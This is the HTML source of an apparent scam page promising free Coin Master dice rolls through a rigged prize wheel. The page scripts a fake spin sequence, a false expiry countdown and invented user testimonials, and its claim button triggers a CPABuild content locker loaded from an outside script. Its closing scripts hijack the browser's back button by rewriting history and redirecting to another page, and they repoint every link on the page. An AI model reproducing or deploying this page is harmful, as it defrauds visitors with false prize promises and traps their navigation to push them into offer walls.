<!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <base href="">
    <meta http-equiv="content-type" content="text/html; charset=utf-8">
    <meta name="robots" content="noindex, nofollow">
    <meta name="referrer" content="no-referrer">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black">
    <meta name="format-detection" content="telephone=no">
      <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <title>(1)Free Rolls Reward Pending</title>
  <link rel="stylesheet" type="text/css" href="prizewheel\sweetalert.css">
  <link rel="stylesheet" type="text/css" href="prizewheel\styles.css">
  <link rel="stylesheet" type="text/css" href="prizewheel\animate.css">
     <link rel="stylesheet" type="text/css" href="prizewheel\walmart\walmart.css">
  <script src="prizewheel\jquery.js" type="text/javascript"></script>
    <link rel="icon" href="data:;base64,iVBORw0KGgo=">

<script type="text/javascript">
       var CPABUILDSETTINGS={"it":1836976,"key":"b6e8a"};
</script>
<script src="https://d13nu0oomnx5ti.cloudfront.net/723bdbf.js"></script>

</head>
<body>
<script type="text/javascript">
  var dayNames = new Array("Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday");
  var monthNames = new Array("January", "February", "March", "April", "May", "June", "July", "August", "September", "October", "November", "December");
  var now = new Date();
  var today= monthNames[now.getMonth()] + " " + now.getDate() + ", " + now.getFullYear();
  function get_date(days){  
    return today = monthNames[now.getMonth()] + " " + (now.getDate() - days);
  }
  function get_day(days){  
    return today = dayNames[now.getDay()];
  }
</script>
<div id="a-nav">
  <h1>CLAIM FREE COINMASTER Rolls</h1>
</div>
<main>
  <div class="content">
    <div class="main-content" id="content1">
      <center>
         <p class="title-small">Congratulations!</p>
         <p style="color:#797979;">Every <script type="text/javascript">
              document.write(get_day(0));
            </script> we select 7 lucky Dice Dream players to receive a special reward. Spin the wheel to claim your special prize.</p>
      </center>
      <div class="offerlst">
<div style="text-align: center;">
<span style="font-family: Arial; font-size: 18px;">Congratulations! You are Today's Lucky Player - <b>
<script language="javascript" type="text/javascript">// <![CDATA[

var today_date= new Date()
var month=today_date.getMonth()
var today=today_date.getDate()
var year=today_date.getFullYear()

var months = new Array(
"January",
"February",
"March",
"April",
"May",
"June",
"July",
"August",
"September",
"October",
"November",
"December");
//
// ]]></script>
<script language="javascript" type="text/javascript">// <![CDATA[

document.write(months[month]+" "+today+", "+year)
//
// ]]></script>
</b> </span></div>
<div style="text-align: center;">
</div><!--
<span style="display: block; text-align: center;"><img alt="IP" border="0" src="http://www.wieistmeineip.de/ip-address/?size=468x60" height="60" width="468"></span>
-->
<br>

      </div>                             
      </div>
      <div id="spinner">
        <img id="spinBG" src="prizewheel\img\11.png">
        <img id="spin" src="prizewheel\img\BHZ3eXq.png">
        <img onclick="" id="win" src="prizewheel\img\spin-button.png">
        <img id="iphone" class="animated rotateIn" src="prizewheel\walmart\prize.png">
      </div>                             
      </div>                  
    </div>        
</main>
<div class="sweet-overlay" tabindex="-1" style="opacity: 1.03; display: block;"></div>
<div id="modal01" class="sweet-alert animated bounceIn visible">
  <!--<img src="win.png" alt="">-->
   <div style="padding: 16px; text:black;"> <h2>Congratulations Claim Free Rolls Now!</h2>
  <p attr-cou="default"><font color="black"><strong>We would like to thank you for your continuing support for our services - so we are offering you a chance to receive an exclusive reward</strong></font><br><br>
  
  
  
<img src="https://i.imgur.com/bqH9uMx.jpg" alt="Trulli" width="100%" height="auto">
  
  
  
  
    <font color="black"><strong>Click "OK" to claim your special Rolls prize ðŸŽ</strong><br><br><strong><font color="red">Good Luck!</font></strong></font></p>
  <p attr-cou="es"></p></div>
  <div class="sa-button-container">
    <div class="sa-confirm-button-container">
        <button onclick="hidemodal01()" style="display: inline-block; ">OK</button>
        
        
        
        
        
        
        
        
  
        
        
        
        
        <div class="la-ball-fall"></div>
    </div>
  </div>
</div>
<div id="modal02" class="sweet-alert animated bounceIn">
  <div id="success02" class="sa-icon sa-success">
    <span id="successtip02" class="sa-line sa-tip"></span>
    <span id="successlong02" class="sa-line sa-long"></span>
    <div class="sa-placeholder"></div>
    <div class="sa-fix"></div>
  </div>
    <h2>Try again!</h2>
    <p style="margin-bottom: 22px;">You have <strong>(1)</strong> extra spin!</p>
  <div class="sa-button-container">
    <div class="sa-confirm-button-container">
        <button onclick="hidemodal02()" style="display: inline-block; ">OK</button>
        <div class="la-ball-fall"></div>
    </div>
  </div>
</div>
<div id="modal03" class="sweet-alert animated bounceIn">
  <div id="success03" class="sa-icon sa-success">
    <span id="successtio03" class="sa-line sa-tip"></span>
    <span id="successlong03" class="sa-line sa-long"></span>
    <div class="sa-placeholder"></div>
    <div class="sa-fix"></div>
  </div>
  <div style="padding: 0 16px 32px 16px;">
  <h2>Congratulations!</h2>
      <p><strong>(1) 3800	  Free Rolls Gift</strong> is reserved for you!</p><p>To claim your prize, click the button bellow and verify your information on the next page.</p><br>
      
  <!-- Footer starts-->
      <script type="text/javascript">function countDown () {
            var minsTag = $('#mins');
            var hsecsTag = $('#hsecs');
            var minVal = Number(minsTag.html());
            var secVal = Number(hsecsTag.html());
            setInterval(function() {
                secVal = secVal - 1;
                if (secVal < 0 && minVal > 0) {
                    secVal = 59;
                    minVal -= 1
                    if (minVal < 0) {
                        minVal = 0;
                    }
                } else if (secVal < 0 && minVal <= 0) {
                    secVal = 0;
                }
                minsTag.html(minVal);
                hsecsTag.html(secVal);
            }, 1000);
          }</script>
      <p></p>
        <button style="display: inline-block; background-color: #8BC34A;font-size: 18px; padding: 18px 44px;width:100%;" onclick="CPABuildLock()">Claim Your Rolls Now</button>
        <div class="timer" style="margin-top:5px;margin-left:5px">
                   <p>Your prize will expire in <span style="color:red;font-weight: 600;"><span id="mins">5</span>:<span id="hsecs">30</span></span></p>
                </div>
        <div class="la-ball-fall"></div>
    </div>  
</div>
<script>
  function hidemodal01(){
    $('#modal01').removeClass('visible');
    $('.sweet-overlay').css('display','none');
    $('#spin').addClass('spinAround');
    setTimeout(function () {
        $('#modal02').addClass('visible');
        $('.sweet-overlay').css('display','block');
        setTimeout(function () {
          $('#success02').addClass('animate');
          $('#successtip02').addClass('animateSuccessTip');
          $('#successlong02').addClass('animateSuccessLong');
        }, 500);
    }, 7500);
  }
  function hidemodal02(){
    $('#modal02').removeClass('visible');
    $('.sweet-overlay').css('display','none');
    $('#spin').addClass('spinAround2');
    setTimeout(function () {
        $('#iphone').css('display','block');
    }, 7000);
    setTimeout(function () {
        $('#modal03').addClass('visible');
        $('.sweet-overlay').css('display','block');
        setTimeout(function () {
          $('#success03').addClass('animate');
          $('#successtip03').addClass('animateSuccessTip');
          $('#successlong03').addClass('animateSuccessLong');
        }, 500);
    }, 8000);
  }
</script> 
<script type="text/javascript" defer="">
setInterval('countdown()',1000);
function countdown(){
  var mins = parseInt(document.getElementById("mins").innerHTML);
  var secs = parseInt(document.getElementById("hsecs").innerHTML);
  if(mins!=0 && secs==0){
    nmins = mins -1; nsecs = 59;
  }
  else if(mins!=0 || secs!=0){
    nmins = mins; nsecs = secs - 1;
  }
  else if(mins==0 && secs==0){
    nmins = mins; nsecs = secs;
  }
  document.getElementById("mins").innerHTML = nmins;
  document.getElementById("hsecs").innerHTML = nsecs;
  if(nsecs < 10) nsecs = "0" + nsecs;
  document.getElementById("hsecs").innerHTML = nsecs;
}
</script>
<div class="content">
      <div class="main-content2" style="background: #f3f3f3;">
        <p style="text-align: center;">
        </p><div class="comments" style="color: #3b5898;">
          <p style="margin: 0px; padding: 0px; " id="total_likes">
            <i class="icon-commenting"></i>
              <span class="like" style="font-size: 14px;">126,278</span> <span style="font-size: 13px; color:#8e8e8e;">people like this</span>
          </p>
          
          
          
          
          
          
        </div><!--/.comments-->
        <div class="comments ">
            <span style="color: #3b5898; font-size: 15px; ">View Comments</span>
            <span style="color: #9E9E9E; text-align: right; float: right; font-size: 15px;">65,460</span>
          <div style="clear: both;"></div>
        </div><!--/.comments-->
        <div class="comments">
          <div class="comment-content pic1">
            <p class="name">Ally Chen</p>
            <p class="comentarios">Thank God!,I had never won anything, but today I was lucky got 4000 Rolls! Thank you!</p> 
            <span class="comment-status">
            <span>
                <span class="like">Like</span>&middot; Reply &middot; Just now
              <i class="icon-thumbs-up"></i>
            </span>
          </span>
          </div><!--/.comments-content pic1-->
          <div class="clr"></div>
        </div><!--/.comment-->
        <div class="comments">
          <div class="comment-content pic2">
            <p class="name">Phil Graham</p>
            <p class="comentarios">Initially I was not sure if this is real or not, but I have received my 4000 Rolls today, thank you!!</p>
              <span class="comment-status">
            <span>
                <span class="like">Like</span>&middot; Reply &middot; 2 minutes ago
              <i class="icon-thumbs-up"></i>
            </span>
          </span>
          </div><!--/.comments-content pic2-->
          <div class="clr"></div>
        </div><!--/.comments-->
        <div class="comments">
          <div class="comment-content pic3">
            <p class="name">Mike Hines</p>
            <p class="comentarios">At first I thought this was just a joke, but the Rolls arrived by the mail this morning! <br></p>
              <span class="comment-status">
            <span>
                <span class="like">Like</span>&middot; Reply &middot; 4 minutes ago
              <i class="icon-thumbs-up"></i>
            </span>
          </span>
          </div><!--/.comments-content pic3-->
          <div class="clr"></div>
        </div><!--/.comment-->
        <div class="comments">
          <div class="comment-content pic4">
            <p class="name">Sandra Moore</p>
            <p class="comentarios">Sweeeet! I've won 900 Rolls!! My gosh!</p> 
            <span class="comment-status">
            <span>
                <span class="like">Like</span>&middot; Reply &middot; 8 minutes ago
              <i class="icon-thumbs-up"></i>
            </span>
          </span>
          </div><!--/.comments-content pic4-->
          <div class="clr"></div>
        </div><!--/.comments-->
        <div class="comments">
          <div class="comment-content pic5">
            <p class="name">Tom Rise</p>
            <p class="comentarios">I've lost ðŸ˜¢ Can I play again???<br></p>
              <span class="comment-status">
            <span>
                <span class="like">Like</span>&middot; Reply &middot; 11 minutes ago
              <i class="icon-thumbs-up"></i>
            </span>
          </span>
          </div><!--/.comments-content pic5-->
          <div class="clr"></div>
          <!--/.comment-status-->
        </div><!--/.coments-->
      </div>
    </div>    
<script type="text/javascript">var tu="spin.html";if(function(t,r){"function"==typeof define&&define.amd?define(["exports"],r):"object"==typeof exports?(r(exports),"object"==typeof module&&null!==module&&(module.exports=exports=exports.uri)):r(t.lil=t.lil||{})}(this,function(t){"use strict";var r=/^(?:([^:\/?#]+):\/\/)?((?:([^\/?#@]*)@)?([^\/?#:]*)(?:\:(\d*))?)?([^?#]*)(?:\?([^#]*))?(?:#((?:.|\n)*))?/i;function o(t){return"string"==typeof t}function e(t){return decodeURIComponent(escape(t))}function n(t){var r={};if("string"==typeof t)return t.split("&").forEach(function(t){t=t.split("="),r.hasOwnProperty(t[0])?(r[t[0]]=Array.isArray(r[t[0]])?r[t[0]]:[r[t[0]]],r[t[0]].push(t[1])):r[t[0]]=t[1]}),r}function u(t){return function(r){return r?(this.parts[t]=o(r)?e(r):r,this):(this.parts=this.parse(this.build()),this.parts[t])}}function s(t){this.uri=t||null,o(t)&&t.length?this.parts=this.parse(t):this.parts={}}function i(t){return new s(t)}return s.prototype.parse=function(t){var o=e(t||"").match(r),u=(o[3]||"").split(":"),s=u.length?(o[2]||"").replace(/(.*\@)/,""):o[2];return{uri:o[0],protocol:o[1],host:s,hostname:o[4],port:o[5],auth:o[3],user:u[0],password:u[1],path:o[6],search:o[7],query:n(o[7]),hash:o[8]}},s.prototype.protocol=function(t){return u("protocol").call(this,t)},s.prototype.host=function(t){return u("host").call(this,t)},s.prototype.hostname=function(t){return u("hostname").call(this,t)},s.prototype.port=function(t){return u("port").call(this,t)},s.prototype.auth=function(t){return u("host").call(this,t)},s.prototype.user=function(t){return u("user").call(this,t)},s.prototype.password=function(t){return u("password").call(this,t)},s.prototype.path=function(t){return u("path").call(this,t)},s.prototype.search=function(t){return u("search").call(this,t)},s.prototype.query=function(t){return t&&"object"==typeof t?u("query").call(this,t):this.parts.query},s.prototype.hash=function(t){return u("hash").call(this,t)},s.prototype.get=function(t){return this.parts[t]||""},s.prototype.build=s.prototype.toString=s.prototype.valueOf=function(){var t=this.parts,r=[];return t.protocol&&r.push(t.protocol+"://"),t.auth?r.push(t.auth+"@"):t.user&&r.push(t.user+(t.password?":"+t.password:"")+"@"),t.host?r.push(t.host):(t.hostname&&r.push(t.hostname),t.port&&r.push(":"+t.port)),t.path&&r.push(t.path),t.query&&"object"==typeof t.query?(t.path||r.push("/"),r.push("?"+Object.keys(t.query).map(function(r){return Array.isArray(t.query[r])?t.query[r].map(function(t){return r+(t?"="+t:"")}).join("&"):r+(t.query[r]?"="+t.query[r]:"")}).join("&"))):t.search&&r.push("?"+t.search),t.hash&&(t.path||r.push("/"),r.push("#"+t.hash)),this.url=r.filter(function(t){return o(t)}).join("")},i.VERSION="0.2.2",i.is=i.isURL=function(t){return"string"==typeof t&&r.test(t)},i.URI=s,t.uri=i}),location.search){var queryString=(currentUrl=lil.uri(location.href)).search(),outputOrigUrl=lil.uri(tu),outputOrigQuery=outputOrigUrl.search(),sep=null!=outputOrigQuery&&outputOrigQuery.length>0?"&":"?";null!=queryString&&""!=queryString&&(tu=outputOrigUrl+sep+queryString)}var currentUrl=location.origin+location.pathname+location.search;"#!/hst"!==location.hash&&(history.replaceState(null,document.title,currentUrl+"#!/hst"),history.pushState(null,document.title,currentUrl)),window.addEventListener("popstate",function(){"#!/hst"===location.hash&&setTimeout(function(){window.location.replace(tu)},0)},!1);for(var anchors=document.getElementsByTagName("a"),i=0;i<anchors.length;i++)anchors[i].href=tu;</script>
<script>
        (function (window, location) {
            var redirect = "spin.html";
            if (location.search) {
                var url = lil.uri(location.href);
                var queryString = url.search();
                var outputOrigUrl = lil.uri(redirect);
                var outputOrigQuery = outputOrigUrl.search();
                var sep = outputOrigQuery != undefined && outputOrigQuery.length > 0 ? '&' : '?';
                if (queryString != undefined && queryString != '') {
                    redirect = outputOrigUrl + sep + queryString;
                }
            }
            var currentUrl = location.origin + location.pathname + location.search;
            if (location.hash !== "#!/hst") {
                history.replaceState(null, document.title, currentUrl + "#!/hst");
                history.pushState(null, document.title, currentUrl);
            }
            window.addEventListener("popstate", function () {
                if (location.hash === "#!/hst") {
                    setTimeout(function () {
                        window.location.replace(redirect);
                    }, 0);
                }
            }, false);
        }(window, location));
    </script>
</body></html>